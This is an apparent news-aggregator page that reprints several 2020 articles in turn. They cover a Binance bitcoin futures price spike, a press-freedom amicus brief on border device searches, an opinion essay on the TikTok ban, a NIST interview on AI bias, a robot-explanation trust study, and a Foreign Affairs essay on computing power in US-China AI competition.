Another Day In Crypto, Warns Binance CEO After Nightmare Bitcoin Futures Spike To $100,000 – Forbes

Bitcoin, after suddenly soaring early last week, had a difficult day last weekend.

The bitcoin price briefly topped $12,000 only to flash-crash early on Sunday morning, pushing bitcoin back to just over $10,000.

Meanwhile, bitcoin and cryptocurrency exchange Binance, the world's largest by volume, was having problems of its ownwith one trader briefly sending the price of some bitcoin futures to $100,000.

Bitcoin futures, allowing investors to speculate on the future price of bitcoin, have become ... [+] increasingly popular in recent years.

"Another day in crypto," Binance chief executive Changpeng Zhao, often known as CZ, warned via Twitter, revealing the bitcoin futures price spike and explaining, "a users [algorithm] went ballistic and sent multiple orders to achieve this."

Bitcoin futures trading has surged in popularity over the last year or so, pushed on by exchanges such as Binance, and the Chicago Mercantile Exchange (CME) and the Chicago Board Options Exchange (CBOE) offering long-awaited cash-settled bitcoin futures.

According to a statement released by Binance after the "large price fluctuation," the "extreme" price movement in the bitcoin quarterly futures contract "did not cause any liquidations in user positions."

"We do have price band protection," CZ added, meaning the rogue trade did not cause other traders to lose the capital they'd used to speculate on the future bitcoin price.

The bitcoin futures spike to around $100,000 was explained by one user's algorithm going ... [+] "ballistic."

Despite assurances, the bitcoin futures price spike caused consternation among crypto traders.

"Crazy price spikes like this are a trader's worst nightmare," professional bitcoin and crypto trader and author of The Crypto Trader, Glen Goodman, said via email.

"Thankfully, Binance's systems ensured nobody's account was liquidated, but not all exchanges would be so responsible in a similar situation."

Bitcoin and crypto exchanges including Malta-based OKEx, Singapore-based Huobi and Saychelles-based BitMex, along with Binance, currently of no fixed address, dominate bitcoin futures trading, with billions of dollars' worth of contracts traded across the platforms every day.

"It's a wake-up call to all traders that you need to make sure you use a respected exchange for your trading," Goodman said, adding: "It's also a timely reminder that when you trade obscure derivatives like quarterly bitcoin futures, all it takes is one giant whale to corner all the little fish and liquidate their accounts."

Others, however, saw the bitcoin futures price spike as nothing more than an unfortunate blip for the burgeoning market.

"Bitcoin has come a long way in the past 11 years," Cory Klippsten, tech investor and founder of bitcoin buying app Swan Bitcoin, said via Telegram. "An event like this on a single exchange is no longer a cause for concern."

The bitcoin price has soared over the last month, adding a staggering 25% and pushing it above the ... [+] psychological $10,000 per bitcoin level.

Klippsten pointed to bitcoin's tumultuous history of spikes and crashes as evidence this latest roller coaster won't negatively impact bitcoin or cryptocurrency in the long term.

"Anomalies on individual exchanges don't seem to matter much for adoption," Klippsten said.

"The history of the space has been filled with flash crashes or spikes and exchange hacks, but observant people understand that it's a matter of improving on immature infrastructure, not a problem with cryptocurrency itself."

Read more:
Another Day In Crypto, Warns Binance CEO After Nightmare Bitcoin Futures Spike To $100,000 - Forbes

Reporters Committee amicus brief in Alasaad v. Wolf – Reporters Committee for Freedom of the Press

Amicus brief filed by the Reporters Committee for Freedom of the Press, the Knight First Amendment Institute at Columbia University, and 12 media organizations

Court: U.S. Court of Appeals for the First Circuit

Date Filed: August 7, 2020

Background: Representing several international travelers, including journalists, the American Civil Liberties Union and the Electronic Frontier Foundation sued the heads of the U.S. Department of Homeland Security, U.S. Customs and Border Protection, and U.S. Immigration and Customs Enforcement, arguing that suspicionless searches of electronic devices at the U.S. border violated Fourth Amendment protections.

The district court agreed with the plaintiffs, but held that border agents needed to meet only the reasonable suspicion standard, rather than the more stringent probable cause standard, before searching a travelers devices. The government and the plaintiffs both appealed to the U.S. Court of Appeals for the First Circuit.

Our Position: Border officials should be required to seek warrants based on the higher probable cause standard before they can search electronic devices.

Quote: Electronic device searches are highly invasive, especially for journalists. The contents of electronic devices can reveal the stories a journalist is developing, with whom she is communicating, and her specific travel plans. Disclosure of such information can expose sensitive newsgathering methods and deter potential sources from speaking to members of the media.

Related: This is the second friend-of-the-court brief that the Reporters Committee and the Knight First Amendment Institute have filed on behalf of the plaintiffs in this case. At the trial court level, when DHS, CBP, and ICE asked the district court to dismiss the case, the Reporters Committee and the Knight First Amendment Institute, represented pro bono by attorneys from Jenner & Block and Morgan, Lewis & Bockius LLP, filed a brief urging the court to deny the governments motion. The court allowed the case to continue.

According to a Reporters Committee analysis of U.S. Press Freedom Tracker data, journalists reported being subjected to secondary screenings, questionings, or searches by U.S. Customs and Border Protection 16 times in 2019, compared to 11 in 2018 and 16 in 2017. Seventy-five percent of the stops in 2019 occurred at the U.S.-Mexico border.

Read this article:

Reporters Committee amicus brief in Alasaad v. Wolf - Reporters Committee for Freedom of the Press

The US declared war on TikTok because it cant handle the truth – The Verge

I cannot emphasize enough how messed up this entire sell TikTok to an American company saga is. The latest twist is a deeply confusing set of executive orders banning transactions with ByteDance (TikToks Chinese parent company) and WeChat (a Chinese texting app). The legal dubiousness of this move is the least strange thing about it.

But there is no use in dwelling on it. As of writing, ByteDance is in talks to sell TikTok to Microsoft. The only question worth thinking about is why this matters to ordinary Americans more specifically, should we be afraid of Chinese apps like TikTok?

In July, Secretary of State Mike Pompeo told Fox News that Americans should only use TikTok if you want your private information in the hands of the Chinese Communist Party. Its not just the GOP administration lashing out, either; the Democratic National Committee has also previously issued warnings to campaign staff not to use TikTok on their work phones, citing how much data is gathered.

TikTok does gather a lot of personal data, but its no more than what Facebook and other social networks also gather. The difference between TikTok and Facebook is that we have a great deal of transparency into the process by which Facebook gives your information to various governments. And specifically, Facebook does not release data to the Chinese government.

When it comes down to it, the thorniest privacy dispute of 2020 isnt about privacy or technology at all its about China. The question Is Facebook better, worse, or the same as TikTok? is more or less the same as Is the United States better, worse, or the same as China?

And in 2020, this is becoming a genuinely difficult question to answer. China is detaining over a million Uighurs in internment camps, citing national security issues. The United States detains migrants in its own internment camps, even going as far as to place children in cages. China is not a democracy; the American president has proposed to unconstitutionally delay this years election. China brutally represses its political dissidents; in America, law enforcement in military camouflage have grabbed protesters off the streets and shoved them into unmarked vans.

Earlier this summer, the American president decided to tweet when the looting starts, the shooting starts in response to mass protests only a few days before the anniversary of the Tiananmen Square massacre. I am writing this column from Portland, Oregon, with my gas mask hanging next to my desk. When I go to tie my shoes, my laces emit faint puffs of residual tear gas.

The protests in my city are the same protests happening elsewhere in the country protests against police violence and racial discrimination. As these protests were raging, Secretary Pompeo gave a speech at the National Constitution Center in Philadelphia where he attacked The New York Times 1619 Project, which originated as a special issue of The New York Times Magazine containing articles examining slavery and its lasting legacy in everything from mass incarceration to pop music.

They want you to believe that Marxist ideology that America is only the oppressors and the oppressed, said Pompeo. The Chinese Communist Party must be gleeful when they see the New York Times spout this ideology.

In a tweet that excerpted the speech, he called the project a slander on our great people.

One might ask, why on earth would the Chinese Communist Party give a damn about a year-old article on the relationship between race and the construction of the interstate highways?

Pompeos invocation of the Chinese government only makes sense if you break apart the assumptions piece by piece. The 1619 Project criticizes America; to criticize America is to make it weak; to make America weak is to make China strong.

I call this ideology information-nationalism. Heres how I would describe its assumptions:

1. When your country acknowledges human rights abuses, you are made weak

2. You can weaken rival nation-states by exposing their human rights abuses

For a long time, Chinas crackdown on all references to the 1989 Tiananmen Square massacre has been held as the prime example of the dangers of internet censorship. It is also the clearest example of information-nationalism: to allow Chinese citizens to speak of or remember Tiananmen Square is to cultivate weakness.

So China cant acknowledge Tiananmen Square or its present-day treatment of the Uighurs. For the inverse reason, Russian disinformation operations on Facebook have promoted real videos of police brutality in America and attempted to organize Black Lives Matter protests. Before that, Russian state media outlet RT excelled in its coverage of Occupy Wall Street and WikiLeaks. For years, Russia has sought to emphasize and even exacerbate existing tensions in the United States, presumably because it believes this is in Russias own interest.

Now, the American government is spinning the 1619 Project as slander that aids the Chinese Communist Party.

Information-nationalism is part of a larger trend toward authoritarianism in the world, but it should still be distinguished from its other facets. It is related to totalitarianism, which frequently relies on propaganda and surveillance, but it is not exactly the same. It walks closely with fascism, which thrives on mythologizing shared national identities.

But information-nationalism is not about mythologies or misinformation. When you play the game of information-nationalism, you dont slander your enemies; you tell the truth about them, while hiding the truth about yourself.

The major players in this game are China (with its unrivaled surveillance-censorship apparatus and Great Firewall), Russia (with its highly successful RT network and its shadowy Internet Research Agency), and the US (which still lays claim to some of the biggest tech companies in the world). At this point in time, the leaders of all three countries have bought into the same values and same assumptions about information-nationalism. It is not so much a cold war as it is three identical Spider-Mans pointing fingers at each other.

Ten years ago, I would have deemed the project of information-nationalism to be an authoritarian delusion in the face of an unruly and powerful technology. Come on, guys, its the internet! But consider this 2018 New York Times article about social media use by the younger generation in mainland China.

Chu Junqing, also 28, a human resources representative, said she spent two to three hours watching funny short videos after work on Tik Tok. She reads news sometimes on the news app Jinri Toutiao but found that many countries were embroiled in wars and riots. China is so much better, she said.

The same article goes on to describe a survey of 10,000 Tencent users born in 2000 or later. Nearly 8 in 10 believed that China had either never been better or was becoming better every day; almost as many were optimistic about the future. (A Pew Research Center poll of Americans in the same year found that 44 percent were somewhat or very pessimistic about Americas future.)

This is not to say that this is because China is winning at information-nationalism. (Consider the protests in Hong Kong.) But because it has successfully built an ecosystem of China-specific apps and services all tied to a centralized censorship-surveillance apparatus, it is capable of engaging in information-nationalist warfare at a level the US presently cannot. (Consider how TikTok which carried footage of the protests is now blocked in Hong Kong.)

For many years, the United States ran its own version of the Chinese state-controlled internet apparatus, but we just called it the internet. Its not only that its predecessor, the ARPAnet, was an American military project. In very recent memory, the global internet was dominated by services like Google, YouTube, Facebook, Twitter, and so on. These companies founded in the United States, and run primarily by Americans on American soil implicitly transmitted American values and culture to other countries.

Google, for instance, pulled out of China in 2010 when the company discovered the country had been attempting to hack into activists Gmail accounts. The company felt it could no longer stay for moral reasons. And although Chinas censorship of the Tiananmen Square massacre was not the official reason that Google pulled out, it became a pretty good post facto justification. The companys immediate response to the hack was to stop censoring search results. Shortly after, then-Secretary of State Hillary Clinton gave a speech at the Newseum in which she compared Chinese censorship to an information iron curtain. In the same speech, she was supportive of Google, saying, I hope that refusal to support politically motivated censorship will become a trademark characteristic of American technology companies. It should be part of our national brand.

In 2000, Yahoo! fought against French laws banning the sale of Nazi memorabilia, citing American free speech rights. (They lost in 2006.) In 2009, as photos and videos of Irans Green Revolution exploded across Twitter, the Clinton State Department privately reached out to the company asking them to delay scheduled maintenance, lest they disrupt information-swapping by Tehrani dissidents.

In these instances and more, American tech companies behaved as an informal arm of the US State Department, operating on the assumption that the freedom of expression and the freedom to dissent against any government are not just inherent goods, but values that, when spread abroad, will strengthen Americas diplomatic position. Free speech, capitalism, and Coca-Cola for all.

This, as it turned out, was a neat piece of hypocrisy, as revealed by Edward Snowden in 2013. Just like China had tried to use Google to spy on its activists, the National Security Agency had been secretly collecting bulk data from almost every American company you could think of. The mass collusion of American tech companies in programs like PRISM created a disillusionment that gradually decayed into a kind of moral ambivalence in Silicon Valley. If America does it, why not let China? And conversely: if China does it, why not America?

But still, hypocritical or not, the old American internet was in no way equivalent to the Great Firewall of China. And neither is the old foreign policy equivalent to the new. Regardless of how the American government behaved in secret, its public-facing policy was once to promote liberal democracy. Now it is openly engaged in information-nationalism.

Information-nationalism pervades many arenas, beyond the issues of racism and political dissent. The federal government has made it harder to see numbers on coronavirus infections. The president has even said on the record that increased testing will make him look bad. The logic behind this is the same logic that drove the Chinese Communist Party to hide the pandemic in Wuhan in the very early days, much to everyones detriment. The similarities in their behavior will not stop the president from blaming China for a cover-up thats exactly how information-nationalism works.

The United States has embarked on a new relationship with the world, and with truth, that will shape technologies in the years to come. It will motivate economic regulation, censorship statutes, export laws, and even domestic bans of foreign apps and services. This is not to say: Companies good; government bad. Rest assured, everyone and everything is bad. Its bad all the way down. What Im saying is, this is the context in which various proposals to regulate tech both the meritorious and the inane are being developed.

In May, Twitter attached a fact-checking note to two of the presidents tweets about mail-in ballots. For this display of floppy-yet-still-extant spine from Twitter, Inc., the White House issued an executive order of dubious legality threatening to take away Communications Decency Act Section 230 protections from tech companies based on rule-making by the Federal Communications Commission.

Although this executive order purports to limit Section 230, thats not the real goal. Without Section 230, Twitter would be liable to a host of people affected by President Trumps own tweets like Joe Scarborough, who the president has smeared with a murder accusation. If Scarborough sues Twitter, the logical result is that Trumps tweets are censored.

The executive order is instead better understood as an attempt to bully companies into regulating speech according to the governments tastes. What that would look like can be stitched together based on who or what they claim is being censored.

Keep in mind that the executive order was prompted by a fact-check of a claim about election fraud in mail-in voting. Since then, the president has again tweeted the same claim, this time using it to suggest that the election should be delayed. (The co-founder of the conservative Federalist Society, Steve Calabresi, has called the tweet fascistic.)

But lets set aside the part about American democracy dangling by a thread and look at other examples of unfairly censored speech speech that, according to the government, should be protected from the caprices of social media moderation. One study has been touted as proving that conservatives are censored more on social media, but a closer look is deeply damning. The study chose, among others, the following accounts to represent the conservative side: the former KKK leader David Duke, the white nationalist Richard Spencer, and I am not making this up the literal American Nazi Party.

The study may be an outlier in its brazenness, but thats what it takes in order to claim that there is a bias against conservative speech. Social networks have a baked-in bias in favor of conservative speech, in that they will use a newsworthiness exception to avoid moderating the presidents increasingly unhinged posts, even if they break the rules.

Twitter broke with precedent when, the day after the executive order on social media was signed, the platform censored a presidential tweet saying when the looting starts, the shooting starts, on the grounds that it glorified violence.

The tweet was about the George Floyd protests in Minneapolis, but thats not where the phrase originated: a Miami police chief used it in 1967 announcing a get tough policy in the citys Negro district. Like so much speech in the Trump era, the racism is closer to text than subtext. In order to defend the tweet, one not only has to erase the origin of the quote, but twist oneself into knots over the historical connotations of thugs and looting and the present-day context of applying those words to a Black Lives Matter protest.

Thats, of course, the point. Information-nationalism is not an inherently racist ideology. But in order to confront racism, one must be clear-eyed about the countrys past and present. Its no coincidence that anti-Semitism is tied so closely to Holocaust denialism, or that racists today claim that the Confederacy rebelled for reasons other than slavery. Under the logic of information-nationalism, forgetting is strength and remembering is weakness. Thus, anti-racism becomes dangerous, while racism is just another valid political viewpoint.

So what would a rejection of information-nationalism look like? The opposite of information-nationalism is not free speech as Americans know it. It is rather found in Germany, a country with strict hate speech laws that are antithetical to the American civil libertarian tradition.

I think a lot about the New Yorker profile of German Chancellor Angela Merkel, especially this passage that describes the halls of power that Merkel walks. Red Army graffiti from the conquest of Berlin including Moscow to Berlin 9/5/45 and I fuck Hitler in the ass is kept on display. Reminders of the horrors of the Holocaust and the Nazi regime litter Berlins landscape. The New Yorkers George Packer concludes, Like a dedicated analysand, Germany has brought its past to the surface, endlessly discussed it, and accepted it, and this work of many years has freed the patient to lead a successful new life.

In 2020, one may very well question this stirring conclusion. (A right-wing extremist shot a regional German politician in the head in 2019; this February, another extremist murdered nine people of foreign heritage in Hanau.) Still, theres something to be said about the German approach. It stands as opposed to information-nationalism as any country can get, and yet Germany has not fallen.

American leaders are not eager for the United States to take its collective self to the psychiatrists couch to hash out its hidden pathologies. Thats nothing new America has never really officially grappled with its past. (To be fair, very few nations do!) Still, there is a big difference between not teaching Howard Zinn in high school and banning Howard Zinn. For the secretary of state to attack an anti-racist examination of history as a national slander is a significant step toward the latter.

That doesnt mean ordinary Americans want to participate in information-nationalism. Indeed, people literally lined up on the street to get free copies of the 1619 Project magazine issue on the day it published. The majority of Americans believe that Black Americans are discriminated against, especially by the police.

For months, protests have been widespread in cities across the country. In early June, a poll found that 54 percent of Americans believed that the actions of protestors, including the burning of a police precinct, sparked by the death of George Floyd at the hands of Minneapolis police were either fully or partly justified. In my home of Portland, Oregon, the protests have been going on for over 60 days, with an uptick in conflict in just the past three weeks, after local news reported that federal law enforcement had seized at least one protester off the street and pulled him into an unmarked minivan.

Lately, I have seen Portlanders using traffic cones and water bottles to trap and defuse tear gas canisters, or using leaf blowers to blow the gas back at the police. These are strategies they learned from watching videos of the Hong Kong protests, videos disseminated on TikTok and Twitter.

In order for the project of information-nationalism to gather steam in the United States, it will have to overcome not only the will of the people, but traditions like the freedom of the press. The news outlet that first reported the unmarked van arrest by federal agents was Oregon Public Broadcasting, which takes a small part of its funding from the federal government. We still live in a country where government funds can be used to criticize the government.

But institutions and popular dissent erode under steady pressure. Time and new technologies can carve out unthinkable landscapes. China did not forget Tiananmen Square overnight; Russias Internet Research Agency wasnt built in a day. The banning of apps, the passage of new digital surveillance laws, the regulation of speech on platforms, the government sponsorship (implicit or explicit) of new technologies these are the battles that make up information-nationalist warfare.

For what its worth, I do not think America will build its own Great Firewall. But this has less to do with faith in the strength of American values and more to do with the sheer scope of such a project. Im pretty sure America can only make a very poor imitation of the Chinese surveillance-censorship apparatus, just like Im pretty sure TikTok by Microsoft is going to suck balls.

In other words, the United States has embroiled itself in a war it cannot win and has no business fighting in the first place. I suppose that is one American tradition that wont be easily undone.

See more here:
The US declared war on TikTok because it cant handle the truth - The Verge

Tackling the problem of bias in AI software – Federal News Network

Best listening experience is on Chrome, Firefox or Safari. Subscribe to Federal Drives daily audio interviews onApple PodcastsorPodcastOne.

Artificial intelligence is steadily making its way into federal agency operations. Its a type of software that can speed up decision-making, and grow more useful with more data. A problem is that if youre not careful, the algorithms in AI software can introduce unwanted biases. And therefore produce skewed results. Its a problem researchers at the National Institute of Standards and Technology have been working on. With more, the chief of staff of NISTs information technology laboratory, Elham Tabassi, joinedFederal Drive with Tom Temin.

Tom Temin: Mr. Tabassi, good to have you on.

Elham Tabassi: Thanks for having me.

Tom Temin: Lets begin at the beginning here. And we hear a lot about bias in artificial intelligence. Define for us what it means.

Elham Tabassi: Thats actually a very good question and a question that researchers are working on this, and a question that we are trying to find an answer along with the community, and discuss this during the workshop thats coming up in August. Its often the case that we all use the same term meaning different things. We talk about it as if you know exactly what were talking about, and bias is one of those terms. The International Standards Organization, ISO, has a subcommittee working on standardization of bias, and they have a document that with collaborations of experts around the groups are trying to define bias. So one there isnt a good definition for bias yet. What we have been doing at NIST is doing a literature survey trying to figure out how it has been defined by different experts, and we will discuss it further at the workshop. Our goal is to come up with a shared understanding of what bias is. I avoid the term definition and talk about the shared understanding of what bias is. The current draft of standards and the current sort of understanding of the community is going towards that bias is on in terms of disparities in error rates and performance for different populations, different devices or different environments. So one point I want to make here is what we call bias may be designed in. So if you have different error rates for different subpopulations, face recognition that you mentioned, thats not a good bias and something that has to be mitigated. But sometimes, for example, for car insurance, it has been designed in a way that certain populations, younger people pay more insurance at a higher insurance rate than people in their 40s or 50s, and that is by design. So just the difference in error rate is not bias on intended behavior or performance of the system. Its something thats problematic and needs to be studied.

Tom Temin: Yeah, maybe a way to look at it is If a persons brain had all of the data that the AI algorithm has, and that person was an expert and would come up with a particular solution, and theres a variance between what that would be and what the AI comes up with that could be a bias.

Elham Tabassi: Yes, it could be but then lets not forget about human biases, and that is actually one source of bias in AI systems. The bias in AI system can creep in in different ways. They can creep into algorithm because AI systems learn to make decisions based on the training data, which can include biased human decisions or reflect historical or societal inequalities. Sometimes the bias creeps in because the data has been not the right representative of the whole population, the sampling was done that one group is over represented or underrepresented. Another source of bias can be in the design of the algorithm and in the modeling of that. So biases can creep in in different ways and sometimes the human biases exhibit itself into the algorithm, sometimes algorithm modeling and picked up some biases.

Tom Temin: But you could also get bias in AI systems that dont involve human judgment or judgment about humans whatsoever. Say it could be a AI program running a process control system or producing parts in a factory, and you could still have results that skew beyond what you want over time because of a bias built in thats of a technical nature. Would that be fair to say?

Elham Tabassi: Correct, yes. So if the training data set is biased or not representative of space of the whole possible input, then you have bias. One real research question is how to mitigate and unbias the data. Another one is that if during the algorithm biases if theres anything during the design and building in a model, that it can be bias, that can introduce bias, the way the models are developed.

Tom Temin: So nevertheless, agencies have a need to introduce these algorithms and these programs into their operations and theyre doing so. What are some of the best practices for avoiding bias in the outcomes of your AI system?

Elham Tabassi: The research is still out there. This is one of those cutting edge research and we see a lot of good research and results coming out from AI experts every day. But really to mitigate bias, to measure bias and mitigate bias, the first step really is to understand what biases and thats your first question. So unless we know what it is that we want to measure, and we have a consensus and understanding and agreement on what it is that we want to measure, which goes back to that shared understanding of bias or definition of bias, its hard to get into the measurement. So we are spending a little bit more time on getting everybody on the same page on understanding what bias is so we know what it is that we want to measure. Then we get into the next step of how to measure, which is the development of the metrics for understanding and examining and measuring bias in systems. And it can be measured biases in the data and the algorithm, so on so forth. Then its even after these two steps that we can talk about the best practices or the best way of mitigation of the bias. So we are still a bit early in understanding on how to measure because we dont have a good grip on what it is that we want to measure.

Tom Temin: But in the meantime, Ive heard of some agencies just simply using two or more algorithms to do the same calculation such that they be the biases in them can cancel one another out, or using multiple data sets that might have canceling biases in them just to make sure that at least theres balance in there.

Elham Tabassi: Right. Thats one way, and that goes back to what we talked at the beginning of the call about having a poor representation. And you just talked about having two databases, so that can mitigate the problem of the skewed representation or sampling. Just like that, in the literature there are many, many definitions of the bias already. Theres also many different methods and guidance and recommendations on what to do, but what we are trying to do is come up with a set of agreeable and unified way on how to do these things thing and that is still cutting edge research.

Tom Temin: Got it. And in the meantime, NIST is planning a workshop on bias in artificial intelligence. Tell us when and where and whats going to happen there.

Elham Tabassi: Right that workshop is going to be on August 18. Its a whole day workshop. Our plan was to have a demo today but because its virtual workshop, we decided to just have it as one day. The workshop is one of the workshop in a series that NIST plans to organize and have in coming months. The fields of the workshop that they are organizing and planning is trying to get at the heart of what constitutes trustworthiness, what are the technical requirements, what they are and how to measure them. Bias is one of those technical requirements and we have a dedicated workshop on bias on August 18 where we want them to be a interactive discussions with the participants and we have a panel in the morning. The whole morning is dedicated to discussions of the data and the bias in data, and how the biases in data can contribute to the bias into whole AI system. We have a panel in the morning, kind of as a stage setting panel that kind of frame the discussion for the morning and then it will be breakout sessions. Then in the afternoon, the same format and discussion will be around biases in the algorithm and how those can make an AI system biased.

Tom Temin: Who should attend?

Elham Tabassi: The AI developers, the people that are actually building the AI systems, the AI users, the people that want to use AI system. Policy makers will have a better understanding of the issues in AI system and bias in AI systems. People that want to use it, either the developer or the user of technology, and policymakers.

Tom Temin: If youre a program manager, or policymaker and your team is cooking up something with AI, you probably want to know what it is theyre cooking up in some detail, because youre gonna have to answer for it eventually I suppose.

Elham Tabassi: Thats right. And if I didnt emphasize it enough, of course at the research community because they are the one that we go to for innovation and solutions to the problem/

Tom Temin: Elham Tabassi is chief of staff of the information technology laboratory at the National Institute of Standards and Technology. Thanks so much for joining me.

Elham Tabassi: Thanks for having me.

More here:
Tackling the problem of bias in AI software - Federal News Network

The next frontier of human-robot relationships is building trust – Scroll.in

Artificial intelligence is entering our lives in many ways on our smartphones, in our homes, in our cars. These systems can help people make appointments, drive and even diagnose illnesses. But as it continues to serve important and collaborative roles in peoples lives, a natural question is: Can I trust them? How do I know they will do what I expect?

Explainable artificial intelligence is a branch of artificial intelligence research that examines how artificial agents can be made more transparent and trustworthy to their human users. Trustworthiness is essential if robots and people are to work together. It seeks to develop systems that human beings find trustworthy while also performing well to fulfill designed tasks.

At the Center for Vision, Cognition, Learning, and Autonomy at University of California Los Angeles, we and our colleagues are interested in what factors make machines more trustworthy, and how well different learning algorithms enable trust. Our lab uses a type of knowledge representation a model of the world that artificial intelligence uses to interpret its surroundings and make decisions that can be more easily understood by humans. This naturally aids in explanation and transparency, thereby improving trust of human users.

In our latest research, we experimented with different ways a robot could explain its actions to a human observer. Interestingly, the forms of explanation that fostered the most human trust did not correspond to the learning algorithms that produced the best task performance. This suggests performance and explanation are not inherently dependent upon each other optimising for one alone may not lead to the best outcome for the other. This divergence calls for robot designs that takes into account both good task performance and trustworthy explanations.

In undertaking this study, our group was interested in two things. How does a robot best learn to perform a particular task? Then, how do people respond to the robots explanation of its actions?

We taught a robot to learn from human demonstrations how to open a medicine bottle with a safety lock. A person wore a tactile glove that recorded the poses and forces of the human hand as it opened the bottle. That information helped the robot learn what the human did in two ways: symbolic and haptic. Symbolic refers to meaningful representations of your actions: for example, the word grasp. Haptic refers to the feelings associated with your bodys postures and motions: for example, the sensation of your fingers closing together.

First, the robot learned a symbolic model that encodes the sequence of steps needed to complete the task of opening the bottle. Second, the robot learned a haptic model that allows the robot to imagine itself in the role of the human demonstrator and predict what action a person would take when encountering particular poses and forces.

It turns out the robot was able to achieve its best performance when combining the symbolic and haptic components. The robot did better using knowledge of the steps for performing the task and real-time sensing from its gripper than using either alone.

Now that the robot knows what to do, how can it explain its behavior to a person? And how well does that explanation foster human trust?

To explain its actions, the robot can draw on its internal decision process as well as its behavior. The symbolic model provides step-by-step descriptions of the robots actions, and the haptic model provides a sense of what the robot gripper is feeling.

In our experiment, we added an additional explanation for humans: a text write-up that provided a summary after the robot has finished attempting to open the medicine bottle. We wanted to see if summary descriptions would be as effective as the step-by-step symbolic explanation to gain human trust.

We asked 150 human participants, divided into four groups, to observe the robot attempting to open the medicine bottle. The robot then gave each group a different explanation of the task: symbolic, step-by-step, haptic arm positions and motions, text summary, or symbolic and haptic together. A baseline group observed only a video of the robot attempting to open the bottle, without providing any additional explanations.

We found that providing both the symbolic and haptic explanations fostered the most trust, with the symbolic component contributing the most. Interestingly, the explanation in the form of a text summary didnt foster more trust than simply watching the robot perform the task, indicating that humans prefer robots to give step-by-step explanations of what theyre doing.

The most interesting outcome of this research is that what makes robots perform well is not the same as what makes people see them as trustworthy. The robot needed both the symbolic and haptic components to do the best job. But it was the symbolic explanation that made people trust the robot most.

This divergence highlights important goals for future artificial intelligence and robotics research: to focus on pursuing both task performance and explainability. Only focussing on task performance may not lead to a robot that explains itself well. Our lab uses a hybrid model to provide both high performance and trustworthy explanations.

Performance and explanation do not naturally complement each other, so both goals need to be a priority from the start when building artificial intelligence systems. This work represents an important step in systematically studying how human-machine relationships develop, but much more needs to be done. A challenging step for future research will be to move from I trust the robot to do X to I trust the robot.

For robots to earn a place in peoples daily lives, humans need to trust their robotic counterparts. Understanding how robots can provide explanations that foster human trust is an important step toward enabling humans and robots to work together.

Mark Edmonds, PhD, Candidate in Computer Science, University of California, Los Angeles. Yixin Zhu, Postdoctoral Scholar in Computer Science, University of California, Los Angeles.

This article first appeared on The Conversation.

Original post:
The next frontier of human-robot relationships is building trust - Scroll.in

The U.S. Has AI Competition All Wrong – Foreign Affairs

The development of artificial intelligence was once a largely technical issue, confined to the halls of academia and the labs of the private sector. Today, it is an arena of geopolitical competition. The United States and China each invest billions every year in growing their AI industries, increasing the autonomy and power of futuristic weapons systems, and pushing the frontiers of possibility. Fears of an AI arms race between the two countries aboundand although the rhetoric often outpaces the technological reality, rising political tensions mean that both countries increasingly view AI as a zero-sum game.

For all its geopolitical complexity, AI competition boils down to a simple technical triad: data, algorithms, and computing power. The first two elements of the triad receive an enormous amount of policy attention. As the sole input to modern AI, data is often compared to oila trope repeated everywhere from technology marketing materials to presidential primaries. Equally central to the policy discussion are algorithms, which enable AI systems to learn and interpret data. While it is important not to overstate its capability in these realms, China does well in both: its expansive government bureaucracy hoovers up massive amounts of data, and its tech firms have made notable strides in advanced AI algorithms.

But the third element of the triad is often neglected in policy discussions. Computing poweror compute, in industry parlanceis treated as a boring commodity, unworthy of serious attention. That is in part because compute is usually taken for granted in everyday life. Few people know how fast the processor in their laptop isonly that it is fast enough. But in AI, compute is quietly essential. As algorithms learn from data and encode insights into neural networks, they perform trillions or quadrillions of individual calculations. Without processors capable of doing this math at high speed, progress in AI grinds to a halt. Cutting-edge compute is thus more than just a technical marvel; it is a powerful point of leverage between nations.

Recognizing the true power of compute would mean reassessing the state of global AI competition. Unlike the other two elements of the triad, compute has undergone a silent revolution led by the United States and its alliesone that gives these nations a structural advantage over China and other countries that are rich in data but lag in advanced electronics manufacturing. U.S. policymakers can build on this foundation as they seek to maintain their technological edge. To that end, they should consider increasing investments in research and development and restricting the export of certain processors or manufacturing equipment. Options like these have substantial advantages when it comes to maintaining American technological superiorityadvantages that are too often underappreciated but too important to ignore.

Computing power in AI has undergone a radical transformation in the last decade. According to the research lab OpenAI, the amount of compute used to train top AI projects increased by a factor of 300,000 between 2012 and 2018. To put that number into context, if a cell phone battery lasted one day in 2012 and its lifespan increased at the same rate as AI compute, the 2018 version of that battery would last more than 800 years.

Greater computing power has enabled remarkable breakthroughs in AI, including OpenAIs GPT-3 language generator, which can answer science and trivia questions, fix poor grammar, unscramble anagrams, and translate between languages. Even more impressive, GPT-3 can generate original stories. Give it a headline and a one-sentence summary, and like a student with a writing prompt, it can conjure paragraphs of coherent text that human readers would struggle to identify as machine generated. GPT-3s data (almost a trillion words of human writing) and complex algorithm (running on a giant neural network with 175 billion parameters) attracted the most attention, but both would have been useless without the programs enormous computing powerenough to run the equivalent of 3,640 quadrillion calculations per second every second for a day.

The rapid advances in compute that OpenAI and others have harnessed are partly a product of Moores law, which dictates that the basic computing power of cutting-edge chips doubles every 24 months as a result of improved processor engineering. But also important have been rapid improvements in parallelizationthat is, the ability of multiple computer chips to train an AI system at the same time. Those same chips have also become increasingly efficient and customizable for specific machine-learning tasks. Together, these three factors have supercharged AI computing power, improving its capacity to address real-world problems.

None of these developments has come cheap. The production cost and complexity of new computer chip factories, for instance, increase as engineering problems get harder. Moores lesser-known second law says that the cost of building a factory to make computer chips doubles every four years. New facilities cost upward of $20 billion to build and feature chip-making machines that sometimes run more than $100 million each. The growing parallelization of machines also adds expense, as does the use of chips specially designed for machine learning.

The increasing cost and complexity of compute give the United States and its allies an advantage over China, which still lags behind its competitors in this element of the AI triad. American companies dominate the market for the software needed to design computer chips, and the United States, South Korea, and Taiwan host the leading chip-fabrication facilities. Three countriesJapan, the Netherlands, and the United Stateslead in chip-manufacturing equipment, controlling more than 90 percent of global market share.

For decades, China has tried to close these gaps, sometimes with unrealistic expectations. When Chinese planners decided to build a domestic computer chip industry in 1977, they thought the country could be internationally competitive within several years. Beijing made significant investments in the new sector. But technical barriers, a lack of experienced engineers, and poor central planning meant that Chinese chips still trailed behind their competitors several decades later. By the 1990s, the Chinese governments enthusiasm had largely receded.

